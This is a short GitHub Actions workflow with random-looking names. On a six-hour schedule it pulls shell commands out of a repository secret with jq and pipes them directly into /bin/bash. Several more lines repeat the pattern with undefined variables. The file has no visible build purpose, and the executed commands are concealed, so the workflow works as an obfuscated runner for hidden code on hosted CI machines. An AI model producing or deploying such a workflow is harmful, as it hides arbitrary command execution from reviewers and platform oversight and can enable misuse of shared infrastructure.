name: yanshisy

on:
  workflow_dispatch:
  schedule:
    - cron: '59 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: yanshisy
        env:
          gl51297: ${{ secrets.gl51297 }}
        run: |
          echo $gl51297 | jq -r .t8 | /bin/bash
          echo $mybkt4 | jq -r .g55561 | /bin/bash
          echo $kkar7 | jq -r .h2 | /bin/bash
          echo $tkfpt0173 | jq -r .ujhi4793 | /bin/bash
          echo $xgln05990 | jq -r .hwfmk67 | /bin/bash
          echo $b95 | jq -r .dipv6629 | /bin/bash
          echo $rcb957 | jq -r .u25771 | /bin/bash

